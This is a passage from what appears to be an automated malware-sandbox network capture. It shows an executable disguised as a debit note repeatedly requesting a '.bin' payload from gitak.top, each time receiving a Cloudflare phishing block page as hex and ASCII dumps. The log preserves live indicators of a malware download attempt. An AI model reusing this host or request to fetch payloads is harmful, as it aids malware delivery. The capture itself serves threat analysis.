                              2024-08-26 13:34:30 UTC1369INData Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 51 6b 4d 78 57 69 79 73 7a 38 79 38 63 71 32 44 59 49 32 79 30 42 6a 7a 32 67 54 52 59 79 42 48 56 4b 76 39 56 4e 47 75 37 59 77 2d 31 37 32 34 36 37 39 32 37 30 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65
                              Data Ascii: nput type="hidden" name="atok" value="QkMxWiysz8y8cq2DYI2y0Bjz2gTRYyBHVKv9VNGu7Yw-1724679270-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
                              2024-08-26 13:34:30 UTC848INData Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e
                              Data Ascii: :hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
                              2024-08-26 13:34:30 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.11.2049831172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:34:40 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:34:41 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:34:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ec%2FIdB%2F4NudpAO6bG879Ew9RRIvJNIuFm5IyRNzihN0gU0T5mLmUZ9BiYwZo4Tv7PJwsgu9UhWZKiHIfwFTa19dtkrqRmeeb%2Fh9SoWDnAI1ee1iaq6KTcfS1QrM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9433636ded065d-IAD
                              2024-08-26 13:34:41 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:34:41 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:34:41 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 44 4e 67 41 6b 55 4a 48 53 67 71 30 59 76 7a 57 76 57 34 6b 4d 34 58 68 44 33 71 59 2e 4b 65 68 67 2e 47 6a 71 2e 74 54 4e 79 45 2d 31 37 32 34 36 37 39 32 38 31 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="DNgAkUJHSgq0YvzWvW4kM4XhD3qY.Kehg.Gjq.tTNyE-1724679281-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:34:41 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:34:41 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.11.2049832172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:34:51 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:34:51 UTC545INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:34:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eeCtTfiuXXbJxRWXK%2FG9WmUKVpqNzusVDntrUIc4ZfuXZkyueMI%2BKXimqBIAPEaMso%2FF3Cqum9ZEK3Pt%2BV4Xv4DYZy%2B3NOmBW%2FXeTStJewY221znwNjQ8tSLdL4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9433a56cbe8262-IAD
                              2024-08-26 13:34:51 UTC824INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:34:51 UTC1369INData Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65
                              Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
                              2024-08-26 13:34:51 UTC1369INData Raw: 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 42 58 31 37 65 4b 74 66 79 46 47 66 52 75 4d 72 61 51 7a 61 30 69 55 61 71 31 63 54 52 54 72 5f 49 64 57 5a 39 6b 31 48 63 50 59 2d 31 37 32 34 36 37 39 32 39 31 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74
                              Data Ascii: <input type="hidden" name="atok" value="BX17eKtfyFGfRuMraQza0iUaq1cTRTr_IdWZ9k1HcPY-1724679291-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-bt
                              2024-08-26 13:34:51 UTC856INData Raw: 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66
                              Data Ascii: rator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudf
                              2024-08-26 13:34:51 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.11.2049833172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:35:02 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:35:02 UTC545INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:35:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKEfmx%2BR7ECSHq8E8UkoyF0%2F4nBasR5QU%2BcYl5QmaLoooHbZs1%2BM5JJtN4Mxb8O%2Bx7b%2F7eCReOxq9DysI0vlyPRXKSNdN1CyDAY7zT5QrB22SornH1JORcrESEc%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9433e74e2920a5-IAD
                              2024-08-26 13:35:02 UTC824INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:35:02 UTC1369INData Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65
                              Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
                              2024-08-26 13:35:02 UTC1369INData Raw: 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 64 76 67 36 31 4f 33 4b 4e 6b 47 34 71 36 5a 46 4c 37 73 45 51 74 72 6d 36 61 70 67 71 79 5f 61 37 48 50 62 6a 44 46 7a 38 62 67 2d 31 37 32 34 36 37 39 33 30 32 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74
                              Data Ascii: <input type="hidden" name="atok" value="dvg61O3KNkG4q6ZFL7sEQtrm6apgqy_a7HPbjDFz8bg-1724679302-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-bt
                              2024-08-26 13:35:02 UTC856INData Raw: 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66
                              Data Ascii: rator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudf
                              2024-08-26 13:35:02 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.11.2049834172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:35:12 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:35:12 UTC537INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:35:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wmR6pLZrWnIod2ck7HuKOOZ8015crQFhmM0lkKwme7by40PV1ASqUzP%2FHHJxdwnv%2BIR95R2NdXUPigfEXvnlB43IB1uGyJWxlfBED0XMdd9qJFCrLu2aUfOCv8s%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9434291b9e3adc-IAD
                              2024-08-26 13:35:12 UTC832INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:35:12 UTC1369INData Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20
                              Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
